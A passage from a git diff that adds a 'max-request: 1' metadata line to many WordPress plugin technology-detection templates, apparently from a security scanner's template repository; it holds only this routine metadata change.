 http/technologies/wordpress/plugins/redux-framework.yaml         | 1 +
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml   | 1 +
 http/technologies/wordpress/plugins/safe-svg.yaml                | 1 +
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml        | 1 +
 http/technologies/wordpress/plugins/sg-cachepress.yaml           | 1 +
 http/technologies/wordpress/plugins/sg-security.yaml             | 1 +
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml     | 1 +
 .../wordpress/plugins/shortpixel-image-optimiser.yaml            | 1 +
 .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 +
 http/technologies/wordpress/plugins/siteguard.yaml               | 1 +
 http/technologies/wordpress/plugins/siteorigin-panels.yaml       | 1 +
 http/technologies/wordpress/plugins/smart-slider-3.yaml          | 1 +
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml       | 1 +
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml   | 1 +
 http/technologies/wordpress/plugins/sucuri-scanner.yaml          | 1 +
 http/technologies/wordpress/plugins/svg-support.yaml             | 1 +
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml  | 1 +
 http/technologies/wordpress/plugins/tablepress.yaml              | 1 +
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml    | 1 +
 http/technologies/wordpress/plugins/the-events-calendar.yaml     | 1 +
 http/technologies/wordpress/plugins/themeisle-companion.yaml     | 1 +
 http/technologies/wordpress/plugins/tinymce-advanced.yaml        | 1 +
 .../wordpress/plugins/translatepress-multilingual.yaml           | 1 +
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml         | 1 +
 http/technologies/wordpress/plugins/under-construction-page.yaml | 1 +
 http/technologies/wordpress/plugins/updraftplus.yaml             | 1 +
 http/technologies/wordpress/plugins/use-any-font.yaml            | 1 +
 http/technologies/wordpress/plugins/user-role-editor.yaml        | 1 +
 .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 +
 http/technologies/wordpress/plugins/w3-total-cache.yaml          | 1 +
 .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 +
 http/technologies/wordpress/plugins/webp-express.yaml            | 1 +
 .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 +
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml         | 1 +
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml         | 1 +
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml  | 1 +
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml     | 1 +
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml            | 1 +
 http/technologies/wordpress/plugins/woocommerce-payments.yaml    | 1 +
 .../wordpress/plugins/woocommerce-paypal-payments.yaml           | 1 +
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml          | 1 +
 http/technologies/wordpress/plugins/woocommerce-services.yaml    | 1 +
 http/technologies/wordpress/plugins/woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/wordfence.yaml               | 1 +
 http/technologies/wordpress/plugins/wordpress-importer.yaml      | 1 +
 http/technologies/wordpress/plugins/wordpress-seo.yaml           | 1 +
 http/technologies/wordpress/plugins/worker.yaml                  | 1 +
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml        | 1 +
 http/technologies/wordpress/plugins/wp-file-manager.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-google-maps.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml     | 1 +
 http/technologies/wordpress/plugins/wp-migrate-db.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml      | 1 +
 http/technologies/wordpress/plugins/wp-optimize.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-pagenavi.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-reset.yaml                | 1 +
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-rollback.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-seopress.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-smushit.yaml              | 1 +
 http/technologies/wordpress/plugins/wp-statistics.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-super-cache.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-user-avatar.yaml          | 1 +
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml         | 1 +
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml          | 1 +
 http/technologies/wordpress/plugins/wpforms-lite.yaml            | 1 +
 http/technologies/wordpress/plugins/wps-hide-login.yaml          | 1 +
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml   | 1 +
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml             | 1 +
 200 files changed, 200 insertions(+)

diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index 7cbd1855ae..ebb5ba1042 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
+    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index 8d579ff23d..fddfbf3118 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
+    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 4a6d8b7bbe..7a6e8a76ec 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
+    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index e4eb308d39..940c0e614c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
+    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index f68ad2a6bf..ac77f4e5f5 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
+    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 10f104f2c7..90aa5881fd 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
+    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 8addc28ded..1bf337da6c 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 2e579621ac..7cec152555 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
+    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
+    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
+    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
+    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
+    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
+    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
+    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
+    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
+    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
+    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
+    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
+    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
+    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
+    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
+    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
+    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
+    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
+    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
+    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
+    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
+    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
+    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 846761f2f7..2249681b6d 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
+    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
+    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
+    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
+    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
